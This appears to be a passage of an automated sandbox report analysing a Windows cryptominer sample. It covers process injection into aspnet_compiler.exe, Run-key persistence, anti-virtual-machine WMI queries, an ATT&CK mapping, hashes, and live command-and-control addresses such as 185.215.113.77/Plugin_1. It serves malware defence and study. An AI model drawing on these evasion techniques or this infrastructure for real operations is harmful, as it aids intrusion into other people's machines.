                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe TID: 400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWindow / User API: threadDelayed 1725Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWindow / User API: threadDelayed 7859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: aspnet_compiler.exe, 00000012.00000003.497163462.0000014553660000.00000004.00000001.sdmpBinary or memory string: hGfSE
                      Source: aspnet_compiler.exe, 00000007.00000002.558770981.0000024752636000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: aspnet_compiler.exe, 00000012.00000003.497163462.0000014553660000.00000004.00000001.sdmpBinary or memory string: HgfSE
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000Jump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140002000Jump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 14006C000Jump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 4A16BCA010Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140002000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 14006C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 2025B82010Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140002000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 14006C000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 3FE2B33010Jump to behavior
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory allocated: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory allocated: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory allocated: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeMemory written: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Modifies the context of a thread in another process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeThread register set: target process: 1244Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeThread register set: target process: 5900Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeThread register set: target process: 2808Jump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeProcess created: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeJump to behavior
                      Source: aspnet_compiler.exe, 00000007.00000002.557982580.0000024750FF0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: aspnet_compiler.exe, 00000007.00000002.557982580.0000024750FF0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: aspnet_compiler.exe, 00000007.00000002.557982580.0000024750FF0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: aspnet_compiler.exe, 00000007.00000002.557982580.0000024750FF0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeQueries volume information: C:\Users\user\Desktop\frF39bBsa7.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeQueries volume information: C:\Users\user\AppData\Roaming\winda.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\winda.exeQueries volume information: C:\Users\user\AppData\Roaming\winda.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\frF39bBsa7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: aspnet_compiler.exe, 00000007.00000002.558770981.0000024752636000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation221Scheduled Task/Job1Process Injection412Masquerading1OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Scheduled Task/Job1Modify Registry1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion131NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection412LSA SecretsSystem Information Discovery213SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Timestomp1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 499492 Sample: frF39bBsa7.exe Startdate: 08/10/2021 Architecture: WINDOWS Score: 96 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected IPack Miner 2->36 38 Machine Learning detection for sample 2->38 40 2 other signatures 2->40 6 frF39bBsa7.exe 1 4 2->6         started        10 winda.exe 1 2->10         started        12 winda.exe 2->12         started        process3 file4 22 C:\Users\user\AppData\Roaming\winda.exe, PE32+ 6->22 dropped 24 C:\Users\user\AppData\...\aspnet_compiler.exe, PE32+ 6->24 dropped 26 C:\Users\user\...\winda.exe:Zone.Identifier, ASCII 6->26 dropped 28 C:\Users\user\AppData\...\frF39bBsa7.exe.log, ASCII 6->28 dropped 42 Writes to foreign memory regions 6->42 44 Allocates memory in foreign processes 6->44 46 Modifies the context of a thread in another process (thread injection) 6->46 14 aspnet_compiler.exe 16 2 6->14         started        48 Machine Learning detection for dropped file 10->48 50 Injects a PE file into a foreign processes 10->50 18 aspnet_compiler.exe 3 10->18         started        20 aspnet_compiler.exe 2 12->20         started        signatures5 process6 dnsIp7 30 82.102.27.195, 46017, 49825 M247GB United Kingdom 14->30 32 185.215.113.77, 49832, 80 WHOLESALECONNECTIONSNL Portugal 14->32 52 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->52 54 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->54 signatures8

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      frF39bBsa7.exe22%VirustotalBrowse
                      frF39bBsa7.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\winda.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe0%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      SourceDetectionScannerLabelLink
                      windowsupdate.s.llnwi.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.215.113.77/Plugin_1nUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu0%Avira URL Cloudsafe
                      http://185.215.113.77x0%Avira URL Cloudsafe
                      http://185.215.113.770%Avira URL Cloudsafe
                      http://185.215.113.77/Plugin_10%Avira URL Cloudsafe
                      http://185.215.113.77/Plugin_1(0%Avira URL Cloudsafe
                      http://185.215.113.77/Plugin_1LH0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      windowsupdate.s.llnwi.net
                      		178.79.242.0
                      		truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.215.113.77/Plugin_1false
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://github.com/mgravell/protobuf-netiaspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpfalse
                        		high
                        https://stackoverflow.com/q/14436606/23354aspnet_compiler.exe, 00000007.00000002.560262930.000002475291D000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpfalse
                          		high
                          https://github.com/mgravell/protobuf-netJaspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpfalse
                            		high
                            http://185.215.113.77/Plugin_1nUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuuaspnet_compiler.exe, 00000007.00000002.560018939.00000247528B5000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://stackoverflow.com/q/11564914/23354;aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpfalse
                              		high
                              https://stackoverflow.com/q/2152978/23354aspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpfalse
                                		high
                                https://github.com/mgravell/protobuf-netaspnet_compiler.exe, 00000007.00000002.560758157.00000247627C1000.00000004.00000001.sdmpfalse
                                  		high
                                  http://185.215.113.77xaspnet_compiler.exe, 00000007.00000002.560130182.00000247528D5000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameaspnet_compiler.exe, 00000007.00000002.560130182.00000247528D5000.00000004.00000001.sdmpfalse
                                    		high
                                    http://185.215.113.77aspnet_compiler.exe, 00000007.00000002.560130182.00000247528D5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://185.215.113.77/Plugin_1(aspnet_compiler.exe, 00000007.00000002.560113695.00000247528D3000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://185.215.113.77/Plugin_1LHaspnet_compiler.exe, 00000007.00000002.558916974.0000024752661000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.77
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLfalse
                                    82.102.27.195
                                    		unknownUnited Kingdom
                                    		9009M247GBtrue

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:499492
                                    Start date:08.10.2021
                                    Start time:14:26:14
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 11m 14s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:frF39bBsa7.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:24
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal96.troj.evad.mine.winEXE@9/6@0/2
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 4.1% (good quality ratio 3.8%)
                                    • Quality average: 71%
                                    • Quality standard deviation: 30.7%
                                    HCA Information:
                                    • Successful, ratio: 75%
                                    • Number of executed functions: 119
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 184.28.85.136, 20.82.209.183, 20.54.110.249, 13.107.4.50, 40.112.88.60, 20.199.120.85, 2.20.178.24, 2.20.178.33, 20.199.120.182, 20.199.120.151
                                    • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, b1ns.c-0001.c-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, b1ns.au-msedge.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    14:27:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run winda "C:\Users\user\AppData\Roaming\winda.exe"
                                    14:27:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run winda "C:\Users\user\AppData\Roaming\winda.exe"
                                    14:28:26API Interceptor334x Sleep call for process: aspnet_compiler.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    185.215.113.7785OZry2mNl.exeGet hashmaliciousBrowse
                                    • scarsa.ac.ug/sqlite3.dll
                                    mUlwg5WgCk.exeGet hashmaliciousBrowse
                                    • milsom.ac.ug/pm.exe
                                    zXiNjPgUyU.exeGet hashmaliciousBrowse
                                    • 185.215.113.77/Plugin_1
                                    vygz5Sujr9.exeGet hashmaliciousBrowse
                                    • 185.215.113.77/Plugin_1
                                    qUaCp2QNnD.exeGet hashmaliciousBrowse
                                    • 185.215.113.77/cc.exe
                                    yVel5pTl3G.exeGet hashmaliciousBrowse
                                    • maurizio.ug/
                                    hrebBwxQXQ.exeGet hashmaliciousBrowse
                                    • maurizio.ug/mozglue.dll
                                    jIpiZgkx9H.exeGet hashmaliciousBrowse
                                    • 185.215.113.77/cc.exe
                                    xrm4z50ja9.exeGet hashmaliciousBrowse
                                    • mazooyaar.ac.ug/
                                    esROxxwm62.exeGet hashmaliciousBrowse
                                    • mazoyer.ac.ug/index.php
                                    F2kvZ2vpfP.exeGet hashmaliciousBrowse
                                    • 185.215.113.77/cc.exe
                                    37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exeGet hashmaliciousBrowse
                                    • mazoyer.ac.ug/index.php
                                    0290FD4F9C7240911D9051F76167A75DD78834E6A03FA.exeGet hashmaliciousBrowse
                                    • mazooyaar.ac.ug/
                                    vNbWo1NOKA.exeGet hashmaliciousBrowse
                                    • mazoyer.ac.ug/index.php
                                    p2iZplibsb.exeGet hashmaliciousBrowse
                                    • mazooyaar.ac.ug/
                                    r6oYAy0fxf.exeGet hashmaliciousBrowse
                                    • mazoyer.ac.ug/index.php
                                    BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exeGet hashmaliciousBrowse
                                    • mazooyaar.ac.ug/sqlite3.dll
                                    EIRWWrdl3w.exeGet hashmaliciousBrowse
                                    • mazooyaar.ac.ug/
                                    fOUyk9Zj9i.exeGet hashmaliciousBrowse
                                    • mazooyaar.ac.ug/
                                    1EB39C14ABCAC667CA35CF294BFDA8AC6282B93028D83.exeGet hashmaliciousBrowse
                                    • gordons.ac.ug/index.php

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    windowsupdate.s.llnwi.netDHL_1012617429350,pdf.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    Invoice Payment.exeGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    l5z3Wydh6A.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    9nMZE7FjpT.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    gelfor.dap.dllGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    ZDEvCI1erK.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    SOA.exeGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    G100InvoiceCopy.vbsGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    c9.dllGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    a3.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    a6s24acjwl.exeGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    Inquiry 001742021.docGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    3Rby9Diztd.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    a04.dllGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    0f.dllGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    OR3ogRDyRh.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    KVx62u3gsv.exeGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    rKQTea8DKe.exeGet hashmaliciousBrowse
                                    • 178.79.242.0
                                    NESMA RFQ EQUIPMENTS AND DOCUMENTS REQUIRED.docGet hashmaliciousBrowse
                                    • 178.79.242.128
                                    6dfce00750c09d7a9927dab4bed6b81a4043fab36fba5.exeGet hashmaliciousBrowse
                                    • 178.79.242.128

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    WHOLESALECONNECTIONSNLyR4AxlwcWJ.exeGet hashmaliciousBrowse
                                    • 185.215.113.15
                                    85OZry2mNl.exeGet hashmaliciousBrowse
                                    • 185.215.113.77
                                    mUlwg5WgCk.exeGet hashmaliciousBrowse
                                    • 185.215.113.77
                                    gBj9L5sENQ.exeGet hashmaliciousBrowse
                                    • 185.215.113.29
                                    rRtj4wSR4G.exeGet hashmaliciousBrowse
                                    • 185.215.113.15
                                    BsyK7FB5DQ.exeGet hashmaliciousBrowse
                                    • 185.215.113.15
                                    vH0SHswvrb.exeGet hashmaliciousBrowse
                                    • 185.215.113.15
                                    SWaTAV7EdD.exeGet hashmaliciousBrowse
                                    • 185.215.113.15
                                    awqybDuoVl.exeGet hashmaliciousBrowse
                                    • 185.215.113.45
                                    TWp9bsqSYi.apkGet hashmaliciousBrowse
                                    • 185.215.113.42
                                    DwssKedtup.exeGet hashmaliciousBrowse
                                    • 185.215.113.77
                                    zXiNjPgUyU.exeGet hashmaliciousBrowse
                                    • 185.215.113.77
                                    eX52te2rsl.exeGet hashmaliciousBrowse
                                    • 185.215.113.22
                                    hK3SLEhK33.exeGet hashmaliciousBrowse
                                    • 185.215.113.77
                                    weCBwOp0MF.exeGet hashmaliciousBrowse
                                    • 185.215.113.25
                                    BB265B16D6C6DAE08BBDF4E7798FE06AA676AC4A8AA9A.exeGet hashmaliciousBrowse
                                    • 185.215.113.15
                                    cXl3GCSRlN.exeGet hashmaliciousBrowse
                                    • 185.215.113.75
                                    vPoxhaVEwF.exeGet hashmaliciousBrowse
                                    • 185.215.113.75
                                    0qbI8SBR3m.exeGet hashmaliciousBrowse
                                    • 185.215.113.77
                                    bW1BOs8wht.exeGet hashmaliciousBrowse
                                    • 185.215.113.107

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Roaming\winda.exe85OZry2mNl.exeGet hashmaliciousBrowse
                                      mUlwg5WgCk.exeGet hashmaliciousBrowse
                                        C:\Users\user\AppData\Local\Temp\aspnet_compiler.exemUlwg5WgCk.exeGet hashmaliciousBrowse
                                          DwssKedtup.exeGet hashmaliciousBrowse
                                            zXiNjPgUyU.exeGet hashmaliciousBrowse
                                              hK3SLEhK33.exeGet hashmaliciousBrowse
                                                vygz5Sujr9.exeGet hashmaliciousBrowse
                                                  CvKf4aWL2U.exeGet hashmaliciousBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aspnet_compiler.exe.log
                                                    Process:C:\Users\user\AppData\Local\Temp\aspnet_compiler.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):642
                                                    Entropy (8bit):5.334492897960888
                                                    Encrypted:false
                                                    SSDEEP:12:Q3La/KDLI4MWuPTxAIWzAbDLI4MNCIBTaOKbbDLI4MWuPOKN08JOKhav:ML9E4Kr8sXE4+jKDE4KGKN08AKhk
                                                    MD5:9188500CC0E5AD7CBEBF5287BE52AFFB
                                                    SHA1:BC826E5B3C6092511AE622A1D94579254EF2CAD6
                                                    SHA-256:3A61C944AA0BAB4C7549F3E473258A40236910E9C8B5532F9F42FA5EB92E6E35
                                                    SHA-512:228B2489C648C534E0524405D880C585B007E855BEA7197872486575C5AD67205C4AFC771B91F01EB390CE79BC8B43105CF41704CB1B43F8F5E1D11524A79191
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
